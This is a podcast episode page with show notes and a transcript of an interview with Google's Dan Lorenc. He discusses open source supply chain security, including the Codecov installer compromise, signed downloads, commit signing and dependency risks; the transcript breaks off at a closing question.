Episode 20

Taking Open Source Supply Chain Security Seriously with Dan Lorenc

00:00:00
/
00:34:59

August 9th, 2021

34 mins 59 secs

Your Hosts
Special Guest
Tags

About this Episode


Sponsored by Reblaze, creators of Curiefense

Panelists

Justin Dorfman | Richard Littauer

Guest

Dan Lorenc
Software Engineering Lead, Google

Show Notes

Hello and welcome to Committing to Cloud Native Podcast! It’s the podcast by Reblaze where we talk about the confluence of Cloud Native and Open Source. Today, we are very excited to have as our guest, Dan Lorenc, who is a Staff Software Engineer and the lead for Google’s Open Source Security Team. Also, he founded projects like Minikube, Skaffold, TektonCD, and Sigstore. Dan will take us back to how he got into open source, Google, Cloud, and how he ended up being a lead for Google’s Open Source Security Team. We learn more about one of the bigger attacks that happened when Codecov Bash Unloader got compromised, what SGET is, what Google is doing to stop dependency nightmares, zombie dependencies, vectors, and why people should not sign Git Commits. Dan has written several blog posts and he talks more about some of them, and he shares some tips on the easiest way to get your security up if you are using cloud providers for working on open source projects. Download this episode now to find out much more from Dan!

[00:01:53] Dan tells us how he got into open source, Google, Cloud, and how he ended up being a lead for the Open Source Security Team. He tells us about his first open source project called Minikube.

[00:05:07] Justin brings up the safer curl URL pipe to bash which has been a topic on Hacker News. We learn more about the attack that happened earlier this year when Codecov bash installer got compromised and Dan explains more about that. Dan goes in-depth about what SGET is.

[00:11:04] Richard asks Dan if he thinks it’s important that people sign their Git commits and he talks about a blog post he wrote a couple of weeks ago about this.

[00:12:40] Dan explains how we can deal with security with stuff in the cloud and he tells us one of the biggest concerns he has right now.

[00:15:12] Find out more about the security leads across Google, and he tells us about an amazing paper that he recommends reading called “Reflections on Trusting Trust” by Ken Thompson.

[00:17:23] Some people at the PSF got a $300,000 grant for supply chain security and Justin asks Dan if he had a role in that. Also, Justin mentions the reports going to Congress and the powerful XKCD graphic.

[00:19:57] Learn what Google is doing to stop dependency nightmares, zombie dependencies, and vectors hitting that area. Also, Richard wonders if you can know as a cloud user what the dependencies actually are that you’re able to be exploited by.

[00:26:54] Richard wonders how Dan stays sane, and how does he decide what to work on next. Also, Dan wrote a blog post called, “Procrastination Driven Development” and he describes how this all works in his brain.

[00:31:07] One thing Justin wants to know is what repository or what package manager keeps Dan up at night. He wonders if there are any out there that need attention, or are they getting the attention that they need.

[00:33:30] Find out where you can follow Dan on the internet and also some great tips to get your security up if you are using cloud providers at the moment for working on open source projects.

Links

Curiefense

Curiefense Twitter

Curiefense Blog

Cloud Native Community Groups-Curifense

community@curiefense.io

Reblaze

Justin Dorfman Twitter

jdorfman@curiefense.io

podcast@curiefense.io

Richard Littauer Twitter

Tzury Bar Yochay Twitter

Dan Lorenc Twitter

Dan Lorenc Website

“Codecov Bash Uploader Dev Tool Compromised in Supply Chain Hack” By Ryan Naraine (Security Week)

SGET

“Should You Sign Git Commits?” By Dan Lorenc

“Reflections on Trusting Trust” By Ken Thompson

“Securing Open Source Software at the Source” By Ashwin Ramaswami

“Zombie Dependencies” By Dan Lorenc

“The Dependency Jungle” By Dan Lorenc

“Procrastination Driven Development” By Dan Lorenc

“Open Source is Under Attack-Dan Lorenc (YouTube)

Dependency - XKCD #2347

Credits



Transcript

[00:01] Dan Lorenc: Open source is starting to become a worry because the tigers are starting to attack it. It was known about these attacks and supply chain attacks in general for decades, right? They go back to at least 1984 I think when Ken Thompson published this amazing paper called reflections on trusting trust, he pranked a bunch of his coworkers at Bell Labs by putting a backdoor into a compiler, that back door was so smart that it would insert backdoors into everything it compile. His coworkers were very smart though. So they know how to disassemble these binaries and [00:27 inaudible], but his backdoor was so good that it also inserted a backdoor into all the disassembling tools. So it would hide the back doors when his coworkers looked at it. So he really baffled everybody and kind of showed that unless, you know, the tools that built all of the tools that built the tools you built all the way down, it's hard to build up trust and software at all.

[00:44] Richard: Hello and welcome to Committing to Cloud Native, the podcast where we talk about the confluence of cloud native and open source. Very excited to introduce our guest today. Before I introduce him, I want to make sure we get to the other panelists on this episode. I am, of course, Richard, Littauer the man without the plan. And then we have Justin Dorfman, the man with the Dorf, Justin, how you doing?

[01:08] Justin: I'm doing great. I'm really excited to talk to Dan.

[01:12] Richard: Me too, Dan, as Justin just said, is our guest. This is Dan Lorenc. He is calling today from Austin, Texas. Dan is a staff software engineer and the lead for Google's open source security team. He looks very secure where he is. I can see lots of, no he's just a normal guy in a t-shirt. So don't be overwhelmed by how awesome his title is. Dan, how are you doing today?

[01:36] Dan Lorenc: I'm having a great day. Thanks for having me on.

[01:38] Richard: Is it really hot in Austin right now? It's really hot everywhere else.

[01:41] Dan Lorenc: Yeah, it's pretty warm. It's not as hot as it can get here in the summer, so don't want to brag too much, but yeah, we're warm.

[01:48] Richard: Pretty good. Now you live in Austin, but you've been in the cloud space for eight years. Tell us how you got where you are. How did you get into open source and Google and cloud?

[01:58] Dan Lorenc: So I've been at Google for about nine years now, in the cloud space for pretty much the entire time since before it was called cloud. My first shop at Google was on the app engine team when that was kind of the only product Google had in the cloud area. If you're not familiar with it. It was a kind of platform as a service product before any of those buzzwords existed. So cloud kind of popped up around it, and around me as I was working on kind of this developer tooling, developer experience area. I got more into open source probably right around when Kubernetes and containers started to pick up. I started playing around with Docker pre 1.0, I remember all the old glory days there and got into the Kubernetes ecosystem right when that started to take off. So it's been a fun ride since.

[02:38] Richard: So how do you end up being a lead for the open source security team? If you're first in a space, someone has to hire you or something, right? So like how did that happen?

[02:48] Dan Lorenc: Yeah. So in the open source, in the supply chain security area, and it was a case of just kind of being really worried about it before anybody else was, I guess. And actually, yeah, that kind of connects back to how I got into open source. When I started at google, I was doing some work on our cloud platform and stuff, but from the inside and Google’s got a pretty different development process than a lot of other companies. Everything's in a big mono repo. And you've probably heard some stories about that. When you step outside of that mono repo and start building things, open source and all the tooling disappears. You're not using these same internal build systems and everything. And it was kind of scary at first.

[03:20] My first open source project was mini cube. I started that project. I don't remember how many years ago now, but that was kind of the standard way to get Kubernetes set up on a laptop. And I was building it on my laptop, publishing this binary on github just from my laptop, that people were just taking and running as route on their computers all over the world. And it was kind of terrifying compared to, you know, the internal stuff I was used to. And they're making that face now, but that's still how most people are doing development.

[03:43] Richard: When you say people. How many people are we talking?

[03:47] Dan Lorenc: Most of them and it's scary. And so, yeah, I started to worry about that, looked around, not a lot of better options in open source. So I've been worried about supply chain security there for awhile, got really serious about it. Maybe two or three years ago. And still it wasn't a big topic. Maybe about a year ago other people starting to worry, the attacks started to pick up, people started to get scared other than just me, I stopped looking like a crazy person. It was a sign by the side of a road saying the end is coming. And then, you know, solar winds and some of the other big attacks happened earlier this year. And now all of a sudden, you say, why haven't we cared about this for longer?

[04:20] Justin: Now you win. First they think you're crazy and now you win.

[04:25] Dan Lorenc: Yeah. If you're too crazy for long enough, eventually people will believe you. Is that the motto?

[04:29] Justin: Let me just tell Richard something. So Richard, I reach out to Dan and I'm like, Hey, I really want you on the podcast, he responds with, oh, here, talk to this person. No, I want you on the podcast because I've looked at your background with minicube and scaffold and six store. I was just blown away. I was like, I didn't realize you were involved with all of that. So the one thing that we've been seeing a lot, especially with security is a safer curl URL pipe to bash. It's been a topic on hacker news. It's always been a thing. So can you tell me and the rest of the world about ESCA? Cause I just learned about it.

[05:13] Dan Lorenc: The curl pipe to bash thing, it's been a meme on hacker news forever. People love to complain about it. There isn't really a lot better you can do in certain circumstances. I think it's also kind of misunderstood too. Some of the problems with it, it's not quite as bad as a lot of people say, but it is really bad in some other ways, I guess. And then I think there's some stuff we can do to improve it overall or we can start I guess. The curl pipe to bash minature, not meme kind of pattern, if you're unfamiliar with it, is a way to install a piece of software. You go to a website and it says, here's a little script. This will install a software for you, just hit this with curl and then execute it on your system. And it will do some smart stuff and install our code.

[05:45] People love to do that as developers because it's pretty easy to set up. You set it up once, you can have a bash that's pretty smart. You don't have to worry about bundling for all 37 different Linux distributions for match, getting into Homebrew and ports and the Mac app store and windows executable and all the different platforms and everything like that. You can kind of just write one bash script [06:02 exists]. The problem though, is that there's not as much security there. There's kind of different security constraints when you're installing software that way. At least now for the most part, people are doing, curl of an HTTPS URL, pipe to bash that wasn't always the case, you know, four or five years ago, before [06:17 inaudible] encrypt took off. And so that was really one of the biggest problems for doing that, then you don't even know what script you're getting or if somebody's kind of man in the middle and modifying the script before it gets to you.

[06:26] But if you do have a script that serve from a pretty good website and there's SSL set up, curl pipe to bash isn't the worst thing in the world. What it is missing though, is a lot of benefits that package managers can give you or a lot of the protections that package managers write to the developers too, which is kind of one of the parts that's misconstrued a bit. When you're app get install a piece of software and debbian say curl for example. You're not taking curl from the curl maintainers’ repo, you're not getting it from github.com/curl. You're getting a fork of curl or the WN maintainers have forked curl and they have promised to apply security patches within a timely manner for a set period of time. That's just how debbian works. The tradeoff there comes from though, is that they're going to be applying patches and they're not going to be taking new features in, it's really just security patches for that time until there's a new debbian release. And then they will bump the version of curl to pick up all the new features and then apply patches again, going forward.

[07:18] So there's really no option in the middle for people today. You either get something maintained by a group of maintainers or you take it directly from upstream. If you get it directly from somebody upstream, then who knows how you're installing it and all that stuff, upstream maintainers don't have signing keys. Tampering can happen even in the places twhere hey publish stuff. So of the attacks that we've seen there, one of the big ones earlier this year was when code coves bash installer got compromised. Are you both familiar with that one?

[07:42] Richard: Our listeners may not be.

[07:43] Justin: Yeah, exactly. Go more into it.

[07:45] Dan Lorenc: Code cove is a popular code coverage standing and they wanted to make it really easy to install this tool and scrape your code coverage metrics as part of CI, so you can track it over time. Just like Linux distributions there are a hundred different CI systems out there. And so they package this installer up in a bash scripts basically. You could curl this bash script. It would install a little reporter in you CI system. And that's all you had to do is really one line. So awesome developer experience. And it's used all over the world. Unfortunately, they had some credential leak happen, which can happen to anybody. It probably does happen to tons of people and somebody found those credentials and use them to tamper with the script that was served to users.

[08:21] And nobody noticed for months, they did some of the best practices they were supposed to do, like publishing hashes for this script and telling people how to verify them. But nobody was doing that basically. Easy way was too easy and people didn't follow the instructions for how to do it correctly. So it took months before anybody noticed this script which was supposed to be uploading code coverage was actually stealing all the secrets in your CI system and exporting them to some IP and we still don't know exactly where they were going. So that was one case where the script was downloaded from the correct URL. They publish hashes, people didn't check those hashes and something in the middle got screwed up. So we thought, how could we make this a little bit easier? And one of the ideas is this new ESCA tool, which I think you were just talking about, right, Justin?

[08:58] Justin: Correct?

[08:59] Dan Lorenc: Yes, so this is a tool we read started as part of the safe star project to try to make the easy way to download stuff. Also the safe/secure way. So safe get or secure get or something like that is where the name came from. The problem with code cove that they ran into really is that if you're going to distribute those hashes for the file you're downloading, you have to put them somewhere and you can't put them right next to the binary or a script you're distributing because then whoever gets the credentials to change that script can just go and change those hashes. So they put them somewhere else, which is the right thing to do. They put them back on the github repo, but that also means nobody's going to go check them because something else have to do. It's another URL you have to figure out and go learn.

[09:36] So the idea we came up with is to use OCI registries. If you're not familiar with the term OCI, it's the same thing. It's like a Docker registry. OCI is the name of the protocol that Docker and everybody's standardized. Now the cool thing about an OCI registry is that you get a shot 2, 5, 6, built into the URL directly. So it's a content addressable API. When somebody uploads a script, you get a URL with the digest built right in and all the tooling enforces that it's correct and all the servers enforces that's correct automatically. So if you put a script there rather than a random S3 bucket or GCs bucket or something like that, and it can't really be tampered with from the time you give somebody a link to that thing. So it makes the digest checking built-in and automatic and easy.

[10:16] Richard: It's like Sri and it's like IPFS, right? It's like basically the same, like content addressable. How many people have to share that link before that's not like a vector, right? Cause if I share a link just with you and then everyone in this podcast know that it's me and you then surely they could just come to our house with hammers and then they have the link.

[10:32] Dan Lorenc: Yeah. So, you know, you still have to get that link to people correctly the first time. And then there's some other stuff you can do there. But yeah, so if you're handing people a link, you get that shop built and you can check it. The ESCA tool will do that. And there's some other cool stuff the ESCA tool can do though, like help you with digital signatures, which are also pretty hard to do and are in pain today. You do want to sign your contents with a physical key, it's got a bunch of YubiKeys here and there are [10:53 inaudible] people can't see the video, but yeah, if you don't have a YubiKey, are little thumb drive size things, you can plug into your computer, they can get some secret credentials on there that you can sign stuff with. And unless you lose that device, people can't really forge those signatures. So we've got integration for all of that built in too.

[11:08] Richard: Do you think it's important that people sign their commits?

[11:10] Dan Lorenc: I do not think signing commits on github and there's so subtlety here. I do not think sign commits on GitHub actually adds a ton of value.

[11:18] Richard: Why not?

[11:19] Dan Lorenc: I wrote a blog post a couple weeks ago about this, it's a similar issue to the one about publishing a digest for the content you're going to download right next to that file. And github when you sign a commit, the way signatures work in general, you have a private key and a public key, and you give everybody your public key beside stuff with the private one, and then they can check that signature against the public key. With github you just have to log in with your password and you upload whatever public keys you want for your account. And if you sign a commit correctly, github gives you [11:46 inaudible]. So if you're trying to protect against people compromising your password for your account, by signing commits, it doesn't really do much cause anybody that compromises your account can also just change the public key on there. And so you'll still get that green badge. So it's kind of protected by the same password that's protecting the account in the first place,

[12:03] Richard: But that's the same logic as Google protecting my password because anyone could just hack into Google and then my password isn't protected. So is that the argument you're making here?

[12:10] Dan Lorenc: [inaudible]  a signing doesn't do much on top of the password. So if you're trusting the password then signing is kind of a false sense of security I guess. There are ways you can make it more secure and get yourself some value, but that really comes down to using something else to distribute that public key on top of just github. You've got to come up with some other system, like you could tweet it, you could post it on Keybase, you could do a lot of these things. But for the most part, people just look at that little green badge on github and assume it's more secure when you get that little green icon saying it's verified, which is sort of the problematic aspect of it.

[12:41] Richard: Yeah. That makes a lot of sense to me. One of the questions I have that comes right off the bad is, we are on the committing to cloud native podcast. So we're all about cloud native here. How do you deal with security with stuff in the cloud when like tweeting your private keys doesn't make a ton of sense and then you're depending upon Amazon's ability to keep those keys sacred. What do I do basically?

[13:03] Dan Lorenc: Yeah there are a couple aspects to that I guess. I think one of the biggest concerns at least that I have right now in cloud native security is Docker images in general. They're huge, there is tons of stuff in there. And for the most part, it's impossible to figure out what's in them. With our techniques, you know, you can start signing your images now. We've got a bunch of tooling and [13:21 inaudible] start to help with that. But even if you do that, you're just signing this big opaque blob for the most part that you're losing visibility into. So if you do a Docker build, you might have a curl pipe to bash inside of Docker file and nobody will know by the time you hand them that Docker image.

[13:37] There's a whole bunch of case studies that have been done. You know, these things go stale, you build an image it's immutable, which is great, but it's immutable, which means it never updates. And so you have to build a new one to update it. And then, so there's a whole bunch of problems that I think will be pretty easy to solve eventually, once we start taking it seriously, but aren't quite solved yet. If you look in your Kubernetes cluster, there's going to be hundreds, thousands of images in a big one. And in each of those, you're probably going to find 20 or 30 vulnerabilities when you start running them through scanners and they start to add up quickly.

[14:03] Richard: But it's your job to take things seriously early. So you're already taking it seriously. So I know you already have a fix for this. What is it?

[14:10] Dan Lorenc: It's kind of another philosophical change people have to start to make in the way they build software. You know, going back to that minicube example I talked about earlier, I was building these minicube binaries on my laptop and handing them to people. Eventually we graduated to building them in a build system that was just, check-ins, sitting on a Mac mini under my desk in the office. You wouldn't run production infrastructure on a bunch of Mac committees sitting under people's desks but for some reason, we're okay with building software on them and then putting that software right into our production environment. I think [14:37inaudible] shifts we have to make, and we saw this with the solar winds attack in general, is that you need to start treating your build environment as seriously or more seriously than the production environment you're going to deploy into.

[14:47] You would go build a huge fence and then slap a cheap block in front of it, that doesn't really make any sense. But the build system really is the doorway into our production environment. So that's not, at least secure the environment that you're going to go put that stuff into, then it just becomes a natural attack point and attackers are starting to figure that out.

[15:05] Richard: So not to go into vectors of attack for Google, but to totally go into vectors of attack for Google, you are the open source security lead. There's also probably a security lead and there's also probably a physical security lead. Do you three all meet up in like a dark room with cigars and figure out like what to do and where to put locks?

[15:26] Dan Lorenc: There are a lot of security leaders across Google. We take security pretty seriously. There are thousands of people that work on it. Open source has started to become a worry before and because attackers are starting to attack it, open source now is under attack. It was known about these attacks and supply chain attacks in general for decades. They go back to at least 1984. I think when Ken Thompson published this amazing paper calls reflections on trusting trust. If you haven't read this or watched any videos about it, you should really look it up. It's amazing. He pranked a bunch of his coworkers at Bell Labs basically, which was full of very smart people by putting a back door into a compiler, that back door was so smart that it would insert backdoors into everything it compile.

[16:04] His co-workers were very smart though so they know how to disassemble these binaries and [16:06inaudible], but his backdoor was so good that it also inserted a backdoor into all the disassembling tools. So it would hide the back doors when his coworkers looked at it. So he really baffled everybody and kind of showed that unless you know the tools that built all of the tools that built the tools you built all the way down, and it's hard to build up trust in software at all. But for some reason we forgot about it after the eighties, until the last couple of years. The best answer I've gotten to that one. I don't have a definitive answer. I haven't sat down all the attackers and asked them why they've only started inserting vulnerabilities and open source software in the last couple of years.

[16:35] Richard: Dude that sounds like you should do that. Why haven't you done that? Come on.

[16:39] Dan Lorenc: Let's get the next episode of the podcast. The best answer I've gotten is that we finally gotten so good at locking down all the other ways and the software security in general was terrible. You need to go and hack the compiler to do these cool tricks. Even in the last decade security has gotten so much better in general, that these supply chain attacks and using open source as a supply chain vector haven't really become easier on their own. They've just become relatively easier because we're using password managers and two factor [17:03 auth] and HTTPS and all of these other things that we should have been doing this whole time. But now that we are doing those, the supply chain attacks are becoming relatively easier. And they're also more insidious in a lot of ways,

[17:15] Justin: After solar winds, it seems like all of a sudden your position is just like totally validated. With that said, we know some folks at the PSF who got that $300,000 grant for supply chain security. What was your role in that if you had one or how was it?

[17:36] Dan Lorenc: The PSF as actually gotten a couple of grants lately. One came from Google. I think they got another one is from Bloomberg. A bunch of organizations are starting to take this seriously and fund this critical infrastructure. This one, I'm sure you've probably seen the XKCD. I can't remember the number now, but it's got this picture of all these crazy complex things built up, all modern digital infrastructure. And then it shows one person holding up one tiny corner of it. And it says one maintainer maintaining this [18:00 inaudible] in Nebraska by themselves for the last 20 years. I think PSF runs some critical infrastructure to our industry, which is the Python package index warehouse and all of that stuff.

[18:10] I think a lot of huge companies that take critical production dependencies on this don't realize how underfunded, understaffed a lot of these things are. And so we've been trying to find a lot of those across the industry that people are relying on without realizing it and get the visibility and get them funding that they need to better maintain and secure and support this infrastructure. Those grants are also going to do some other cool stuff like, you know, integrated vulnerability scanning into the Python tool chains and make it easier to understand what your dependencies are across different requirements dot TXT files.

[18:40] Justin: I got to say I think probably the most prominent non code contribution to open source in the past fiscal year is that XKCD graphic with the Nebraska.

[18:53] Dan Lorenc: [Inaudible]

[18:54] Justin: Yeah Nebraska, like I'm seeing it in reports that are going to Congress, like it's out of this world. So we'll put it in the show notes, but it's just a powerful graphic.

[19:05] Richard: I just keep wondering who it is. I mean, I know the [19:07 crosstalk] lives in Kansas City, so [19:08inaudible] is in Kansas City. That's the closest I can get to Nebraska, but who is a developer in Nebraska? There's gotta be one. There's gotta be one somewhere down the dependency chain. I want to find that person and thank you.]

[19:19] Dan Lorenc: Reach out from Nebraska, wherever you are.

[19:22] Richard: So*s*upply chain checks are the equivalent of taking a couple of horses and a few pistols and hitting up a stage coach as it goes between bank one to bank C across Nebraska, back in the old days, right? That's like let's hit it here. In open source that kind of works by hitting the dependency tree and dependencies are really complex things that are really easy to hack. Justin and I have interviewed Dominic Tara before on our other podcast Sustain where we talk about these sort of issues a lot. And he was the owner of left pad, which had a whole thing happened to it. And that was when we realized, oh crap, what's going on with our dependencies. Dan, what is Google doing to stop dependency nightmare, zombie dependencies, vectors hitting that area.

[20:04] Dan Lorenc: So open source is a critical piece of most software supply chains today. Nobody's running software without open source coming in at some point. And so that's why we're starting to see an attack to the combination of how widely used it is. You know, left pad was a huge wakeup call there. How many different dependencies show up in your transitive tree that you might only install one in a node application, but then that installs 10 and they each install 25, that each installing another 30 and the commonatory start to blow up. And so if you look at each one of those as a potential attack vector and attack point, you start to get pretty scared. I don't remember the exact left pad story. I think it was just deleted. It wasn't actually attacked or something like that. It was deleted or untagged or yanked from NPM or something.

[20:43] Richard: Someone asked Dominic Tara to be the maintainer. He's like, yeah, I don't need to maintain this thing. I live in a sailboat I'm done and gave it to him. And then that person then deleted it. And then everyone's like crap, all of our builts broke.

[20:55] Dan Lorenc: Right, right. Yeah. So it was attacked. There was no malware inserted, no Bitcoin mining, you know, it could have been much, much worse, but it was a big wake up call to everybody that had something depending on that, that didn't know they were depending on that. So there have been some other scary studies showing that, you know, the transit of reach of some of these packages on NPM is huge. If you can get like, kind of make up the stats somewhere, I think it was in a Sona type report. But if you can get the credentials for 10 people on NPM, then that's like 80% of all packages. The fan out ratio is pretty huge. So it's pretty scary that way. What Google is trying to do is just come up with some best practices, visibility and insights around that. So you can actually see how large a transitive dependency tree is.

[21:33] You know, we can't just magically go in and wave a wand and get every project and start reducing these things or cutting off their dependency tree or taking fewer dependencies or fixing all of the code. But it's a cultural shift again, just like the rest of it. And so a lot of it is around showing, visibility how important it is to know, and not just blindly add things to your gomod file or your a package locked out chase on. Just because somebody wrote a library, it doesn't mean it's going to be better for you in the long run than finding a smaller one, assuming it's a little bit more work for yourself. We're not the only ones in the industry working on this stuff, you know, dependent [22:04 bought it] github has been a huge help to people just to kind of automate and make that update process easier than sending people smaller changes constantly is way better tactic than only updating once a year and having the resolve dependency conflicts for the next three months. I mean, we're seeing huge projects like Kubernetes in the cloud native space to actually start to actively go and reduce their dependency tree, which is awesome to see.

[22:26] Richard: So that's an interesting point about Kubernetes, because in the cloud what I'm often doing is having someone else run code that I don't actually see the dependencies. I just say, you go run this code. So can you even know as a cloud user, what the dependencies actually are that you're able to be exported by?

[22:42] Not all of them and that's a big part of it. If you're importing something directly, then maybe you can look in its dependency pile and see everything all the way down. But if you're just grabbing a binary or using a SAS product or something over the service, then no, you can't. And that's pretty scary in a lot of cases. The Kubernetes one is also, you know, there's kind of two sides to it. Kubernetes is this huge application with thousands of its own dependencies. People also import Kubernetes. Almost anything in the cloud native space you can reuse as code from Kubernetes directly.

[23:10] And so by actively reducing their dependencies, Kubernetes is giving themselves a much better footprint and reducing their attack factor. But it also unbox everybody up and down the dependency tree from starting to be able to reduce these things. And that's why this is so hard to kind of prevent and mitigate overall, right.

You're kind of at the mercy of your downstream dependencies and you might not have merged rights and no one was merged rights anymore. We see this a lot with zombie dependencies we were talking about.

[23:34] A project could be super well-maintained until it's not anymore and somebody, you know, just moves on and deletes their github, or it leaves it there without responding to email and that kind of thing, it's impossible to those. Cause you know, a really good stable project doesn't get a lot of work, which is awesome. And those are the types of things you should depend on because they're not breaking constantly, but that looks from the outside exactly like a project that has 35 CVs inside of it where the maintainer just stopped responding. So it's kind of hard to tease those apart in a lot of cases.

[24:01] Justin: I think maybe it is you bring a good point about dependency bought because I get pings on just by personal repos, like my website for instance. And I update them because it's very simple to do that. And I think maybe another thing github/Microsoft should be looking into preventing these zombie-type repos and dependencies, is once the project gets to a certain size, whether it's downloads or stars or whatever, is to have a successor or to convert that into an organization. I think that would probably be the next step to combat this whole dependency hell security vulnerability. So I think, you know, some people that github and Microsoft, I mean, you can make this happen.

[24:51] Dan Lorenc: Yeah. I haven't actually heard, I thought of it like two seconds before you said it, the way you let up that sentence. I had never thought of like converting it into an organization idea before.

[25:01] Justin: I forgot who said, I think it was Andrew from libraries.io, who suggested that, but I'm not sure. I just know they ran a study of most dependencies in the Ruby community. They just did Ruby because that's their world was one to two maintainers under a personal account. So that's where they kind of got that idea. But sorry, I didn't mean to cut you off.

[25:25] Dan Lorenc: Yeah, that's a great idea. It's a subtle difference and so if you've never played around with GitHub that much, you might not understand the meaning there, but a lot of these things start out under a personal github repository, something like github.com/myusernames/myrepo. I mean, there are certain permissions you can do in a personal repo. Like you can have other maintainers, but there's still only one admin. And it's the person whose name that's under. When you convert something to an organization, you usually give it a different name, but the overall pattern looks the same. So it's github.com/some organization which could look like you user name or not. And then that repo and the organization can have multiple admins that are all kind of equal. And if one steps down and somebody else can kind of, you know, they're also now an admin and you can add other people and configure billing and do all of that cool stuff. So it's a really easy way to increase the bus factor I guess for a lot of these [26:10 stripped] the direction that one goes.

[26:13] Richard: Having worked in a lot of organizations, I wish that were true. But most of the time like the lack of clarity in the actual like organization itself can lead to that being more of a bus factor, not less. I know there are projects working on this, like clearly defined. Clearly defined has helped funded by Google as well as like AWS. And they're trying to basically build a giant database of all dependencies that are like legal or not using SPDX licenses. I don't know if they're already doing stuff like security. They say they're on the website. I forget like whether or not they have say a list of this many maintainers. And this many vulnerabilities. At some point that would be a thing that's going to have to be done at scale, which just takes a lot of effort.

I have kind of a different question if you don't mind, which is, this is all horrifying. This is really scary. I'm scared, right? Like everything is going to break. Everything probably broke yesterday. I just don't know it yet. How do you stay sane? Because it sounds like if everything is an order of magnitude as an issue, how do you decide what to work on next? And I know you've written a blog post called procrastination driven development. So this was a bit of a lead on question, but I'm just curious. Can you describe how that works in your brain?

[27:25] Dan Lorenc: Yeah. I mean, it's a great time to be in this field. There are so many problems, you know, all of it is impactful, but a lot of people get frustrated or turned away and they say, you know, there's no magic bullet here. There's not one thing we can do that's going to fix it all. But that means there's a hundred things that we have to go do and we've got to do them all. And so there's plenty of room, plenty of opportunity for people to help out and get involved. I think one of the biggest areas, like you talked about having data and visibility and knowing where all of these dependencies are coming from, that's kind of where I'm focusing now most of my time at the sixth floor project, because I think that's kind of a prereq for a lot of the other analysis that we can start doing.

[27:57] The supply chains right now are you have one, whether you know it or not, your code is coming from somewhere, that code is coming from somewhere, but you probably can't write it down today. Like if I asked you, what are all of your dependencies, you might be able to write those down. And I say, what are all those dependencies? Probably can't write those down. You know, getting that transitive tree out there. There's another problem though, which is where even if you can start to write those down, especially in the Docker in cloud native world, you might think this container came from that container, which was built in the system, which came from this github repo.

[28:24] But none of that is verifiable today. All of that metadata is, you know, it's just best effort. You're guessing that a Docker image is built from the repo that the person said they built it from and pushed it from. And so we're trying to focus on there is verifiable supply chain metadata, but it doesn't mean it's good or bad. We're not telling you the repo is safe and that the maintainer isn't putting malware and, you know, Bitcoin miners in it.

What we're trying to do is build up a supply chain of metadata that we can trust. And prove that if something came from this repo, it actually did come from that repo. The repo might still have malware in it. That's a separate problem. It might still have a whole bunch of known vulnerabilities, but at least we know it came from that repo.

[28:57] And then we can start to do the same for maintainers and see who the maintainers are. And if there's only one and then we know that's a problem, but a lot of the data today, you just can't trust the data at all to even go and start making a lot of these informed decisions. So that's where I'm starting but because I think it makes it harder to attack supply chains and because it starts to unlock a lot of these other types of things you can do when you have all this data.

[29:17] Richard: Going back to Ken Thompson earlier, he installed backdoors to make it easy for him to show that securities were bad. Can't we just admit that there's always going to be Bitcoin miners working in my dependency tree and just install a back door to have the Bitcoin go to me instead of them like, surely that's the better fix. Just admit it's going to be bad. Make sure the badness goes to you.

[29:37] Dan Lorenc: Yeah attack, the attackers. That's a good one. I think in a of ways the Bitcoin mining and mining stuff has been a nice occurrence and a [29:43 boot] in a lot of ways. It's a disruptive way I can think of as an attacker making a profit off of getting into somebodies infrastructure. It compared to the ransomware attacks we've seen over the last couple of weeks. I think most people would take Bitcoin mining, which is just burning a CPU over, you know, losing customer data or losing access to your service. So in a lot of ways it's nice that this has happened a little bit and nobody wants to have coin miners running on their infrastructure, you know, github even had to go and do a whole bunch of work to reduce quotas and everything then benefit with CI was harder to use for open source projects, but because people were abusing it with clean mining. So it goes both ways. I think we're going to keep seeing it as long as it's that easy to get arbitrary code execution in people's projects. But I'll take that over a bunch of the other attacks we've seen any day.

[30:25] Richard: Yeah. I think what's scary is that this isn't really fun and games at the end of the day. Like it's interesting, but people have died because people have hacked hospitals and demand of ransomware. People have not gotten their chemo because they couldn't get into their systems and didn't know their data. And that's really hard to deal with. That's super stark. I'm glad people like you are out there doing this work. How do you stay sane? I mean, your hair is pretty massive, but like, how do you deal with that pressure?

[30:49] Dan Lorenc: Pressure really, you know, if I don't do anything, then it stays this bad. You know, it's not getting worse. I'm trying to avoid getting one of those Nebraska scenarios, holding everything up myself. And I see it as a whole bunch of small wins we can make every day. So it's kinda nice and motivating that way.

[31:03] Richard: I like that answer. Awesome.

[31:05] Justin: One thing I want to know is what repository or what package manager keeps you up at night? You know, you've got so many different package managers, that's touching pretty much every developer in some way or another. Are there any out there that are like, oh wow, these need attention, or are they getting the attention they need?

[31:28] Dan Lorenc: I think [31:28 PIP] was, I don't want to say it's in a bad state, right? I don't want to blame people. It was something that people didn't realize needed funding over the last year. And I think, you know, through a bunch of different grants and stuff that have gotten us into a much better shape, which is great. I think from a package manager perspective, I think I start to worry more about the kind of OS and distro level ones. The things like Appget, the things like young DMF and the fedora ecosystem. Most of those were built for actual machines that would install things and update things, pin things and downgrade things.

[31:59] And they're built in a different era where the keys are distributed in a different way and all this stuff. So they don't support a lot of the declarative installation mechanisms like you can start to do now in PIP and NPM where you can install fixed versions of things. You lose a lot of metadata when you're doing those old ways and they're at the very bottom of most people's container images. So attacking one of those I think would be really hard to spot, really hard to recover from and pretty wide reaching. Thankfully they're run by professionals and most cases people that take security really seriously, but those are the ones that I do really worry about the most.

[32:32] Justin: Do you think using something along the lines of six store or upgrading their infrastructure or their backend to support today's standards of security is something that could be easy to implement or is it just, they're going to have to like think from the ground up again?

[32:50] Dan Lorenc: I hope so. Six store is only a couple months old at this point, we are seeing people start to use it kind of in parallel with package managers, like their maintainers of WP packages that are signing individual packages with some of our tools. And I hope we get to a point where people can start to use it for those lower level package managers. They've spent years working on their infrastructure, which is great and to make it easy ao people don't have to do that again for the next generation of package managers and everything.

[33:15] Richard: So we're running up on time. So before we head out and I just want to say, thank you so much, but you have so much good advice and you're very eloquent. I think not only in how you talk, but also in how you write, where can people find you on the internet?

[33:30] Dan Lorenc: Yeah. My medium page is where most of the stuff I write ends up D L O R E N C.medium.com. I think I should get you all of that stuff.

[33:39] Richard: And if you had like a couple of tips for anyone out there, who's using cloud providers at the moment for working for open source projects, what would you say is the easiest way to get their security up a tiny bit?

